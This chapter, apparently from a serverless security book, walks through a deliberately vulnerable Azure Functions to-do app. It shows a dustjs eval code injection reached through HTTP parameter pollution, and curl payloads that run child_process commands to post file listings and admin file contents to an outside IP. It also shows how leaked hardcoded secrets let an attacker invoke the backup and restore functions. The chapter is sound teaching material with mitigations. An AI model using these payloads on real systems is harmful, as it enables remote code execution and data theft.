Chapter 4. Securing a Sample Application

In this chapter, we put together a serverless application based on the Node.js runtime. It consists of several functions that serve an API, an HTML rendering view, and a back-office administration interface that lets us populate and control the application’s data.

Our serverless application includes several security vulnerabilities and bad practices that we have discussed in previous chapters. These will help you understand how poor security practices manifest in real-world applications.

Project Setup

This serverless application is meant to be deployed as an Azure Functions project, and its source is available at https://github.com/lirantal/serverless-goof-azure.

We invite you to follow the sample project repository for updates and for support for other cloud providers as we add them over time. We also welcome community contributions that build on the sample application presented in this book.

If you want to try running the application locally or deploying to Azure, you’ll need the following:

- Homebrew for macOS, used to download Microsoft Azure CLI tools; you can also use other installation methods for different operating systems.
- Git, to clone the sample repository.
- Node.js and npm to run the application locally.
- An Azure account and Azure CLI tools.

For Git and the Node.js stack, refer to their respective websites for the best installation method suited to your requirements.

Azure command line tools enable deployment and local testing. Specifically, we use v2 of the Azure CLI and a globally installed npm module to invoke the serverless functions toolkit.

Setting Up an Azure Functions Account

To install Azure CLI on macOS, run the following:

brew update && brew install azure-cli

The az tool should now be available on your path. For other installation methods, refer to the Azure CLI documentation.

Next, you need to invoke the az login command to authenticate your Azure account and create local credentials to be used by the serverless framework when deploying:

az login

To be able to experiment with the function during local development, you need Azure Functions tools, which you can install by running the following:

npm install -g azure-functions-core-tools

The func tool should now be available on your path. For other installation methods, refer to the project’s documentation.

Deploying the Project

After you have cloned the project’s repository at https://github.com/lirantal/serverless-goof-azure and installed the required npm dependencies using the npm install command, you can deploy the project to Azure by running the following command in the project’s directory:

func azure functionapp publish ServerlessGoof



If the to-do application was deployed successfully, its web view should resemble Figure 4-1.

Figure 4-1. The vulnerable Goof TODO application demo running on Azure Functions.

For more detailed instructions for setting up the project in Azure, refer to the README page of the project’s repository.

From this point on, we’ll refer to deployed URLs of the functions as if they were running locally at http://localhost:7071.

Code Injection Through Library Vulnerabilities

Let’s explore how using a third-party open source library can result in a remote code injection vulnerability.

Our to-do application includes a route at /api/rendertodos that renders an HTML view of the to-do list with all the items in the database. This is a server-side view rendered using a template engine on the Node.js backend. To render this template we use the dustjs template engine that was developed by LinkedIn.

Our view template render.dust appears as follows:

<!DOCTYPE html>
<html>
{@if cond="'{device}'=='Desktop'"}
<body style="font-size: medium">
{:else}
<body style="font-size: x-large">
{/if}
<h1 id="page-title">{title}</h1>
{#todos}
<div class="item">
  <a class="update-link" href="#{id}" title="Get this todo item">{text}</a>
</div>
{/todos}
<div>Device string (debug): {device}</div>
</body>
</html>

This template contains conditional logic: if we provide a device query parameter with the value Desktop, it uses a smaller font size; for any other value, it defaults to a larger one.

What if we had tried to tamper with the input and instead of providing the string Desktop we added characters that are used in an HTML context to escape elements? Consider the following URL address, /api/rendertodos?device=Desktop', in which we added a single quote suffix. The rationale of using a single quote is that single and double quotes are usually used in language constructs as wrappers for strings. If we know the code isn’t properly escaping, we’d be able to use the quotes to create a code injection in the contexts where they are used.

This attempt, however, proved futile; we can take a look at the dustjs library source code at dust.js to reveal the reason why:

dust.escapeHtml = function(s) {
  if (typeof s === 'string') {
    if (!HCHARS.test(s)) {
      return s;
    }
    return s.replace(AMP, '&amp;')
      .replace(LT, '&lt;')
      .replace(GT, '&gt;')
      .replace(QUOT, '&quot;')
      .replace(SQUOT, '&#39;');
  }
  return s;
};

The authors have clearly considered the security aspects of using the library and have added countermeasures that encode characters that could lead to Cross-Site Scripting injection.

With that said, can we create a scenario that leads to nonstring-type input being passed to this function, enabling circumvention of the entire secure encoding phase?

We can send a variation of the device query parameter that is parsed as an array, which is a common convention for query parameters. This technique is also known as HTTP parameter pollution; it exploits loosely typed and unvalidated parameters. A request to /api/rendertodos?device[]=Desktop causes the device variable in the code to be treated as an array of items instead of a string, so the escaping mechanism is skipped entirely.
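The bypass can be reproduced in isolation with a minimal sketch. The escapeHtml function below is a simplified stand-in modeled on the library snippet shown earlier, and the regular expressions are assumptions rather than the library’s actual definitions. It also assumes that the query string parser turns device[]=... into a JavaScript array, as qs-style parsers commonly do.

```javascript
// Simplified stand-in for dust.escapeHtml. The regular expressions are
// assumptions for illustration, not copied from the library.
const HCHARS = /[&<>"']/;
const AMP = /&/g;
const LT = /</g;
const GT = />/g;
const QUOT = /"/g;
const SQUOT = /'/g;

function escapeHtml(s) {
  if (typeof s === "string") {
    if (!HCHARS.test(s)) {
      return s;
    }
    return s
      .replace(AMP, "&amp;")
      .replace(LT, "&lt;")
      .replace(GT, "&gt;")
      .replace(QUOT, "&quot;")
      .replace(SQUOT, "&#39;");
  }
  // Non-string values fall through and are returned untouched.
  return s;
}

// ?device=Desktop' arrives as a string, so the quote is encoded.
const asString = escapeHtml("Desktop'");

// ?device[]=Desktop' arrives as an array (assuming a qs-style parser),
// so the typeof check fails and nothing is encoded.
const asArray = escapeHtml(["Desktop'"]);

// Concatenating the array into a string keeps the raw quote intact.
const rendered = "'" + asArray + "'";

console.log(asString);
console.log(rendered);
```

The string input comes back with its quote encoded, while the array input reaches the template with the raw quote still in place.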

When taking another look at our view template, we can see how the device query parameter value is being utilized:

{@if cond="'{device}'=='Desktop'"}

The built-in dustjs helpers provide the @if directive to allow conditional logic that we use in our view. If we take a further look at the dustjs source code at dust-helpers.js, we can see how it works:

cond = dust.helpers.tap(params.cond, chunk, context);
// eval expressions with given dust references
if (eval(cond)) {
  if (body) {
    return chunk.render(bodies.block, context);
  } else {
    _log("Missing body block in the if helper!");
    return chunk;
  }
}

As you can see, the conditional statement is dynamically evaluated and opens the possibility for a severe code injection.

To exploit this vulnerability in our render function, we can send the following request to the serverless application endpoint: /api/rendertodos?device[]=Desktop'-console.log(1)-'. The payload in the request makes more sense now that we’ve uncovered why the vulnerability happens.

The payload tampers with the dynamically evaluated JavaScript: it terminates the quoted string, appends a call to console.log, and then adds a single quote so that the template’s own closing quote completes an empty string (''). When the JavaScript engine evaluates the resulting expression, which begins with 'Desktop'-console.log(1)-'', the console.log method runs on the Node.js server as it renders the view. In this exploit payload, the implications are minimal and simply cause the Node.js server to print a console message. However, what if we were to read sensitive files from the server, or execute commands? All of this is possible because of this code injection vulnerability in dustjs.
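The mechanics can be illustrated with a small sketch that mimics what the @if helper does: it substitutes the device value into the condition string and passes the result to eval. The function names here are hypothetical, and recordSideEffect stands in for whatever code an attacker chooses to run. A plain comparison is included as a contrast, since it never treats the input as code.

```javascript
// Hypothetical stand-in for an attacker-chosen side effect.
let sideEffects = 0;
function recordSideEffect() {
  sideEffects += 1;
  return 0;
}

// Mimics the @if helper: substitute the value into the condition, then eval it.
function vulnerableIsDesktop(device) {
  const cond = "'" + device + "'=='Desktop'";
  return Boolean(eval(cond));
}

// A comparison that never interprets the input as code.
function safeIsDesktop(device) {
  return device === "Desktop";
}

// Benign input behaves as the template author intended.
const benign = vulnerableIsDesktop("Desktop");

// The injected call runs while the condition is being evaluated.
const attacked = vulnerableIsDesktop("Desktop'-recordSideEffect()-'");

console.log(benign, attacked, sideEffects);
```

With the payload, the evaluated expression becomes 'Desktop'-recordSideEffect()-''=='Desktop', so the injected function is called as a by-product of computing the condition.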

The Severity of Third-Party Library Vulnerabilities

This is a reminder that a serverless platform takes responsibility for operating system (OS) dependencies, yet it does nothing about application libraries and the security vulnerabilities and concerns associated with them.

As we just saw, the existence of vulnerabilities in third-party libraries that we use in our code is just as important and significant as security vulnerabilities in our own function code. A code injection vulnerability present in the dustjs-linkedin template library had a severe impact on our function code and allowed arbitrary remote code injection because we also didn’t secure that endpoint with authentication and authorization.

Deploying Mixed-Ownership Serverless Functions

Let’s have a look at a badly managed serverless project in terms of its access and permissions.

As you might have noticed already from the serverless application’s folder structure and each function’s configuration file, the to-do application deploys several functions, including an administration API for back-office tasks such as backing up and restoring the database.

Our serverless project’s directory is as follows:

├── CreateTodos
├── DeleteTodos
├── ExportedTemplate-ServerlessGoofGroup
├── GetTodos
├── ListTodos
├── README.md
├── RenderTodos
├── UpdateTodos
├── ZZAdminApi
├── ZZAdminBackup
├── ZZAdminRestore
├── config.js
├── host.json
├── local.settings.json
├── node_modules
├── package-lock.json
└── package.json

11 directories, 6 files

Why does our serverless application deploy user-facing functions as well as administration capabilities (for example, the function named ZZAdminApi) in the same project?

When we deploy functions in bulk, as in this example, in which an administration interface is delivered along with our business logic, we fail to follow best practices such as deploying functions at a fine granularity, as we covered in previous chapters. This means that we often end up with functions that have a broader permissions scope than they should have, because global roles and resource access apply to the entire project with which the functions are associated, and not just to specific functions.

Unfortunately, serverless projects often follow this antipattern of deploying functions in bulk because it is more convenient and makes it easier for developers to manage and control as they are working on a project.

Let’s assume that we have taken extra measures to define per-function permissions and that we have made sure that our administration-related functions did not use any third-party libraries (if that is even possible) and that our code is written with the best security practices in mind.

Now, let’s build on the anonymous-access remote code injection vulnerability that we discussed in the previous section and see how it can be exploited to affect our admin-related functions.

What if the request payload to exploit the dustjs library was modified to list all files? Such a payload would look like this:

curl "http://localhost:7071/api/rendertodos?device\[\]=\
Desktop%27-require(%27child_process%27).exec\
(%27curl%20-m%203%20-F%20%22x%3D%60ls%20-l%20.%60%22%20http%3A%2F%2F\
34.205.135.170%2F%27)-%27";

Let’s break this command down for more clarity on what it’s doing:

- We use the curl tool to create an HTTP request.
- The HTTP request is sent to the URL http://localhost:7071/api/rendertodos.
- We append a value to the query parameter device to be interpreted as an array.
- We use the same technique as in the previous section to pass a single quote, terminating a string and beginning evaluation of an expression.
- The payload that we’re introducing as a code injection requires the Node.js child_process API and uses it to execute a command on the server side when this code is evaluated.

This request spawns a child process on the Node.js server. The child process runs a curl command that lists the files in the local filesystem, one of which is an interesting ZZAdminApi/ folder that is part of our project, and sends that list to a remote server under the attacker’s control.
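To see what the URL-encoded payload actually contains, it can help to decode it. The following sketch uses only the standard decodeURIComponent function; the variable names are illustrative, and the condition string is reconstructed from the view template shown earlier. Nothing is evaluated here, the code only prints the strings.

```javascript
// The value of the device[] query parameter from the curl command,
// with the shell line continuations removed.
const encoded =
  "Desktop%27-require(%27child_process%27).exec(" +
  "%27curl%20-m%203%20-F%20%22x%3D%60ls%20-l%20.%60%22%20" +
  "http%3A%2F%2F34.205.135.170%2F%27)-%27";

// Decode the percent-encoded characters back into JavaScript source text.
const decoded = decodeURIComponent(encoded);

// Reconstruct the string that the @if helper would hand to eval.
const condition = "'" + decoded + "'=='Desktop'";

console.log(decoded);
console.log(condition);
```

Decoded, the payload is a require('child_process').exec(...) call wrapped in the same quote-and-minus pattern used for the console.log example, and the shell command inside it posts the output of ls -l . to the remote host.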

Another payload prints out the contents of all of these interesting files in the ZZAdminApi/ directory:

curl "http://localhost:7071/api/rendertodos?device\[\]=\
Desktop%27-require(%27child_process%27).exec\
(%27curl%20-m%203%20-F%20%22x%3D%60cat\
%20./admin/*%60%22%20http%3A%2F%2F\
34.205.135.170%2F%27)-%27";

The contents of such files might reveal sensitive information to an attacker. Let’s see what the ZZAdminApi/index.js function code looks like:

const qs = require("qs");
const https = require("https");
const config = require("../config");
const adminSecret = "ea29cbdb-a562-442a-8cc2-adbc6081d67c";
module.exports = function(context, req) {
  context.log("JavaScript HTTP trigger function " + "processed a request.");
  const query = qs.parse(context.req.query);
  const params = context.req.params;
  if (!query || !query.secret || query.secret != adminSecret) {
    // Return an unauthorized response
    context.log("error accessing admin api item");
    context.log(error.message);
    context.res = {
      status: 401,
      body: {
        error: JSON.stringify(error.message),
        trace: JSON.stringify(error.stack)
      }
    };
    return context.done();
  }
}

Even though this is a partial code snippet, it already reveals a bad practice in our admin-related function code: a shared secret has been committed to source control and hardcoded in the function. That secret is now available to anyone who is able to exploit our to-do list application in the way that we demonstrated.

What if we stored the shared secret in a separate file? What if we had stored secrets in a deployment configuration file such as a serverless.yml? The answer lies in the way that our serverless project is deployed. If the tooling also deploys the manifest files, our shared secret will be available as well. This is where key management services become important: they help to mitigate the issue of secrets floating around in a code base or a deployment package.

Separation of concerns is a pattern that we should follow in code as well as in the way that we deploy our serverless projects. Each project should aim to be deployed at the finest granularity possible, to isolate and minimize any security impact of the kind we’ve just demonstrated.
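As a minimal sketch of keeping the secret out of the code base, a function can read it from configuration injected at runtime instead of a hardcoded constant. The setting name ADMIN_SECRET and both helper functions are hypothetical and are not part of the sample project. The sketch relies on the fact that Azure Functions exposes application settings to Node.js through process.env; how the setting is populated, for example from a key management service, is left out.

```javascript
const nodeCrypto = require("crypto");

// ADMIN_SECRET is a hypothetical setting name, not one used by the sample project.
function loadAdminSecret(env) {
  const secret = env.ADMIN_SECRET;
  if (typeof secret !== "string" || secret.length === 0) {
    throw new Error("ADMIN_SECRET is not configured");
  }
  return secret;
}

// Hash both values so the buffers have equal length, then compare them
// in constant time. Non-string input (such as an array) is rejected.
function secretsMatch(provided, expected) {
  if (typeof provided !== "string") {
    return false;
  }
  const a = nodeCrypto.createHash("sha256").update(provided).digest();
  const b = nodeCrypto.createHash("sha256").update(expected).digest();
  return nodeCrypto.timingSafeEqual(a, b);
}

// Usage with a fake environment object; a real function would pass process.env.
const expectedSecret = loadAdminSecret({ ADMIN_SECRET: "example-value" });
console.log(secretsMatch("example-value", expectedSecret));
console.log(secretsMatch("wrong-value", expectedSecret));
```

This only keeps the secret out of the deployed files. An attacker who achieves code execution inside the same function app could still read the process environment, which is one more reason to deploy administrative functions separately from user-facing ones.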

Circumventing Function Invocation Access

When attackers are able to completely circumvent all controls and function flows in order to directly access supposedly protected functions, this is a sure sign of failing to properly address access and permissions issues as indicated in the CLAD model for serverless security, which we discussed in Chapter 1.

In our to-do serverless application, we have two functions, ZZAdminBackup and ZZAdminRestore, which back up and restore the application’s data, respectively. If we look at one of these functions’ configuration files, we can see how they are both protected using the function-scope authorization level of Azure Functions:

{
  "bindings": [
    {
      "authLevel": "function",
      "type": "httpTrigger",
      "direction": "in",
      "name": "req",
      "methods": ["get"]
    },
    {
      "type": "http",
      "direction": "out",
      "name": "res"
    }
  ]
}

The authLevel key identifies a function scope key that is needed to trigger the backup function. In order to invoke it, someone has to know the symmetric key and explicitly specify it when calling the function, such as:

curl "http://localhost:7071/api/ZZAdminBackup?code=\
udFzcnbl/omuDc7AU37hNPnCkhFZ\
lXGJmohn4GzZYJl0jOrNhD5AGw==";

Both functions are seemingly protected given that they can be invoked only if someone has the symmetric key to trigger them.

However, in our application these functions are marshaled through the ZZAdminApi/index.js function code, which acts as a secure gateway for these data administration tasks. To do this, ZZAdminApi/index.js has its own shared secret. When a request supplies that secret along with a parameter that selects either backup or restore, the gateway invokes the respective function.

The following function code snippet from ZZAdminApi/index.js shows how this admin function marshals invocation of these functions:

const adminSecret = "ea29cbdb-a562-442a-8cc2-adbc6081d67c";
// Invoke it!
context.log("invoking " + remoteFunctionURL);
const request = https.get(remoteFunctionURL, res => {
  // TODO not doing anything with data yet
  let data = "";
  res.on("data", chunk => {
    data += chunk;
  });
  res.on("end", () => {
    context.log(`successfully invoked azure function:${action}`);
    context.res = {
      status: 200,
      body: "API call complete"
    };
    return context.done();
  });
});
request.on("error", error => {
  // Error handling
});

Our ZZAdminBackup and ZZAdminRestore functions rely on the order of function invocation to control when they are allowed to execute. This sort of bad practice creates an illusion of security controls that can, in fact, be easily circumvented.

Referring back to our previous examples of remote code injection through the dustjs third-party library, we were able to list files and their contents. If we were to list the contents of the configuration file, we’d find this symmetric key used to invoke both functions:

module.exports = {
  functions: {
    backup: {
      url: "https://serverlessgoof.azurewebsites.net" + "/api/zzadminbackup",
      secret: "udFzcnbl/omuDc7AU37hNPnCkhFZlXGJmohn4G" + "zZYJl0jOrNhD5AGw=="
    },
    restore: {
      url: "https://serverlessgoof.azurewebsites.net" + "/api/zzadminrestore",
      secret: "La8aYiIB5NSuHptv7IaJpvYZSRt7JPi0nI0xEt" + "bN6eW4cnabIKzVhQ=="
    }
  }
};

At this point we can directly invoke the functions as follows:

curl "http://localhost:7071/api/ZZAdminBackup?code=\
udFzcnbl/omuDc7AU37hNPnCkhFZl\
XGJmohn4GzZYJl0jOrNhD5AGw==";

Moreover, because we also are able to access the ZZAdminApi/index.js file and see the shared secret, we can also invoke these functions through this seemingly secure gateway:

curl "https://serverlessgoof.azurewebsites.net\
/api/zzadminapi/backup?secret=\
ea29cbdb-a562-442a-8cc2-adbc6081d67c&code=\
Lk6W5_w1Wzy9mpD6dOWvkwUHQ1EHlZTjduqS1YySbDrvAKde==";

This demonstrates how the supposedly protected functions ZZAdminBackup and ZZAdminRestore were executed by a malicious attacker, circumventing the entire Azure Function authorization mechanism that attempted to protect these functions from unauthorized invocation.

The CLAD model helps in mitigating against such insecure controls by recognizing that each function needs to be its own perimeter. Serverless functions need to be their own independent units, which implies that they each manage their own security controls instead of relying on an order of invocation. Each function should sanitize and validate its own input instead of relying on previous functions to have done so.
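As a rough sketch of a function validating its own input, the render function could check the type and value of the device parameter before it ever reaches the template. The helper names and the allowlist values are hypothetical; the sample application accepts any device string, so rejecting unknown values is an assumption made here for illustration.

```javascript
// Hypothetical allowlist; "Mobile" is an assumed value, not from the sample project.
const ALLOWED_DEVICES = new Set(["Desktop", "Mobile"]);

// Returns the device string when it is acceptable, or null otherwise.
function parseDevice(value) {
  // Rejects arrays and objects produced by device[]=... style parameters.
  if (typeof value !== "string") {
    return null;
  }
  return ALLOWED_DEVICES.has(value) ? value : null;
}

// Hypothetical handler fragment: validate first, render only on success.
function handleRender(query) {
  const device = parseDevice(query.device);
  if (device === null) {
    return { status: 400, body: "Invalid device parameter" };
  }
  return { status: 200, body: "render for " + device };
}

console.log(handleRender({ device: "Desktop" }).status);
console.log(handleRender({ device: ["Desktop'-console.log(1)-'"] }).status);
```

Because the check runs inside the function itself, it holds regardless of which caller or upstream function forwarded the request.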

Summary of the Sample Application

Through the sample application that we have built to deploy to the Azure Functions cloud, you learned how functions can be exploited using different means, ranging from the inclusion of insecure third-party open source libraries that allow remote code injection, to bad security practices applied for function configuration and deployment.
